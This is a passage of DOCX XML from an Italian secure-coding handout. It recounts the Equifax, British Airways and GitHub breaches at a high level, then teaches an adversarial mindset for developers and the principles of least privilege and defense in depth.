          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerabilità</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">= un punto debole nel codice (o nella configurazione) che un attaccante può sfruttare per far fare al sistema qualcosa che non doveva fare.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="70"/>
    <w:bookmarkStart w:id="71" w:name="equifax-2017-147-milioni-di-persone"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Equifax, 2017 — 147 milioni di persone</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Equifax è una delle tre principali agenzie di credito statunitensi: gestisce le informazioni finanziarie di praticamente tutti gli adulti americani. A maggio 2017 viene attaccata sfruttando un bug in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Apache Struts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, una libreria di sviluppo per applicazioni web in Java. Il bug era stato pubblicato (con il codice identificativo CVE-2017-5638; vedremo cos’è un CVE nel </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_4" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">capitolo 4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">) due mesi prima e una correzione era già disponibile. Equifax non l’aveva applicata.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il risultato: dati personali e finanziari di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">147 milioni di persone</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rubati. Accordo finale con le autorità americane: circa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">700 milioni di dollari</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. L’amministratore delegato e il responsabile della sicurezza si dimettono.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L’errore di codice qui non è in Equifax: è in Apache Struts. Ma il problema di Equifax è stato non aver mai aggiornato una libreria con una vulnerabilità nota. Vedremo questo tema nel </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_9" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">capitolo 9</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (sicurezza della</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">supply chain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, cioè delle componenti software di terze parti).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="71"/>
    <w:bookmarkStart w:id="72" w:name="X177ff08d3e0aeb3d2ca1eea42732e8220cb48de"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">British Airways, 2018 — 22 righe di JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un attaccante riesce a inserire 22 righe di JavaScript malevolo all’interno di una libreria caricata dal sito di British Airways. Per due settimane, ogni cliente che inserisce i dati della carta di credito sul sito vede quei dati silenziosamente inviati anche a un server controllato dall’attaccante.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">380.000 transazioni compromesse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il Garante britannico applica una sanzione GDPR inizialmente proposta di £183 milioni, poi ridotta a £20 milioni. Resta ad oggi una delle più grosse sanzioni GDPR mai emesse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lo schema dell’attacco — caricare nel proprio sito codice JavaScript di terze parti senza alcun controllo — si chiama</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Magecart</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ed è ancora oggi attivo su migliaia di siti di e-commerce.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="72"/>
    <w:bookmarkStart w:id="73" w:name="github-2012-egor-homakov-entra-by-design"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">GitHub, 2012 — Egor Homakov entra</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">by design</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un ricercatore di sicurezza russo, Egor Homakov, scopre che GitHub (allora basato su un framework di sviluppo chiamato Ruby on Rails) accetta ciecamente qualsiasi campo gli venga inviato in un modulo e lo applica al modello di dati. Modifica il modulo per aggiungere un parametro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">public_key</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, indicando come proprietario un utente diverso da sé. Il server lo accetta. Risultato: Homakov può ora caricare codice nel repository ufficiale di Rails come se fosse uno dei manutentori del progetto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Repository</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">= nel mondo dello sviluppo software, l’archivio centrale dove è custodito il codice sorgente di un progetto, con tutta la sua cronologia di modifiche. GitHub è una delle piattaforme più note che ospita repository.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per dimostrare la falla, Homakov fa un caricamento pubblico con un messaggio scherzoso. GitHub inizialmente lo banna, poi corregge il bug e si scusa. Il problema era nel codice di GitHub, ma anche nella libreria Rails che facilitava questo tipo di errore.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cinque storie diverse. Cinque tecnologie diverse. Una cosa in comune: il bug era nel codice, non nell’infrastruttura. Nessun firewall avrebbe potuto fermarli.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="73"/>
    <w:bookmarkEnd w:id="74"/>
    <w:bookmarkStart w:id="75" w:name="la-mentalità-avversaria"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="456" w:name="sec_1_3"/>
      <w:r>
        <w:t xml:space="preserve">1.3 La mentalità avversaria</w:t>
      </w:r>
      <w:bookmarkEnd w:id="456"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lo sviluppatore alle prime armi si chiede:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">come faccio funzionare questo?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lo sviluppatore consapevole della sicurezza si chiede anche:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">come potrebbe qualcuno romperlo o abusarne?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Questa seconda domanda non è un atteggiamento pessimistico. È una</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">disciplina professionale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, esattamente come un ingegnere strutturale non si limita a far stare in piedi un ponte: si chiede cosa succede se passano contemporaneamente 200 camion, se c’è un terremoto, se nevica per dieci giorni di fila. Progettare per il caso normale è facile. Progettare per il caso ostile è ingegneria vera.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In pratica, mentre scrivi una funzione che riceve dati dall’esterno, allenati a porti queste sei domande:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa succede se l’input è vuoto?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Una stringa vuota, un valore assente, un campo non compilato. Il mio codice si blocca con un errore o gestisce il caso pulito?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa succede se l’input è enorme?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Mi aspetto cento caratteri ma ne arrivano dieci milioni. Esaurisco la memoria? Il database si blocca?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa succede se l’input contiene caratteri speciali?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Apostrofi, virgolette, parentesi angolari</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, simboli Unicode insoliti, caratteri di controllo invisibili. Il mio codice li tratta come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">dati</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">o come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">comandi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">? La differenza è enorme: vedremo nel </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">capitolo 5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> che questa è la radice della SQL Injection, e nel </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_8" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">capitolo 8</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> che è la radice del Cross-Site Scripting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">L’utente è autenticato — ma è autorizzato?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Mi ha dimostrato di essere chi dice di essere, d’accordo. Ma può davvero accedere a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">questa specifica</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">risorsa? Vedremo questa distinzione nel </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_6" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">capitolo 6</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa succede se la richiesta arriva 1.000 volte al secondo?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Esiste un limite? Il sistema regge o crolla?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Posso fidarmi di quello che mi arriva dal browser dell’utente?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Risposta breve:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">no, mai.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Tutto ciò che arriva dal lato cliente — moduli, parametri nell’indirizzo della pagina, intestazioni HTTP, cookie — può essere stato modificato, alterato, falsificato.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Questa lista non è teorica. È esattamente il modo in cui un attaccante esamina il tuo software prima di provare a romperlo. Imparare a porsi le stesse domande — prima di lui — è il salto qualitativo da</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">programmatore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">programmatore consapevole della sicurezza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="75"/>
    <w:bookmarkStart w:id="81" w:name="X9d544a16aadd7e55d5416a92e735fcf746f731e"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="457" w:name="sec_1_4"/>
      <w:r>
        <w:t xml:space="preserve">1.4 I cinque principi fondamentali del Secure Coding</w:t>
      </w:r>
      <w:bookmarkEnd w:id="457"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esistono cinque principi che attraversano tutto il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">secure coding</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(la programmazione sicura). Sono semplici da enunciare, difficili da applicare con disciplina costante. Li incontrerai in ogni capitolo di questa dispensa.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="76" w:name="Xc44bfa3bb68e17851e22c89c5d554c4caaca89a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Principio 1 — Minimo privilegio (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Least Privilege</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ogni componente — utente, processo, applicazione, account di servizio — deve avere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">solo i permessi strettamente necessari</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per svolgere il suo compito. Niente di più.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Analogia.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">In un grande studio professionale, un nuovo assunto riceve le credenziali di accesso solo alle cartelle dei clienti che gli sono stati affidati, non a tutti i clienti dello studio. Se quelle credenziali vengono compromesse — il portatile rubato, una password esposta — il danno è circoscritto. Se invece ogni dipendente, dal primo giorno, avesse accesso a tutto, una singola compromissione esporrebbe l’intero studio.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Esempio software.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Se la tua applicazione web deve solo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">leggere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dati dalla tabella</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">prodotti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, l’utente con cui si connette al database deve avere il permesso di SELECT (lettura) su quella tabella e nient’altro. Non deve essere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(l’utente con tutti i permessi), non deve poter cancellare tabelle, non deve poter accedere alla tabella</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">utenti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Se domani trovano una SQL Injection nella tua applicazione, l’attaccante è limitato a ciò che quell’utente specifico può fare. Se l’utente è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, l’attaccante diventa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">root</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="76"/>
    <w:bookmarkStart w:id="77" w:name="X02a72317e7dcf572d805ea08b6fadcf750df12f"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Principio 2 — Difesa in profondità (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Defense in Depth</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Nessun singolo controllo di sicurezza è infallibile.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Quindi metti sempre più strati di difesa indipendenti, in modo che se uno fallisce, gli altri tengano.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Analogia.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">L’ingresso di una sede bancaria centrale non ha</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">una</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">difesa. Ha la porta blindata, la bussola con metal detector, la guardia armata, le telecamere, l’allarme silenzioso, il sistema di tracciamento delle banconote. Per arrivare al caveau bisogna superarne tutte in fila, e nel mentre quasi sempre scatta qualche allarme. Una rapina di successo deve aggirarle tutte.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Esempio software.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Per proteggere una pagina di amministrazione di un’applicazione web non basta richiedere il login. Si mettono insieme: (1) login con password robusta, (2) autenticazione a due fattori (codice via app o SMS), (3) verifica che l’utente abbia effettivamente il ruolo di amministratore, (4) verifica che la richiesta arrivi da un indirizzo IP autorizzato (es. la rete aziendale o una VPN aziendale), (5) registrazione su un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">di ogni accesso e di ogni operazione svolta. Se un attaccante riesce a rubare la password, gli altri quattro strati sono ancora in piedi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">= file (o sistema separato) in cui vengono registrate, in ordine cronologico, tutte le operazioni significative di un’applicazione: chi ha fatto cosa, quando, da dove, con quale risultato. Serve sia per diagnosticare i problemi sia per ricostruire un attacco dopo che è avvenuto.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="77"/>
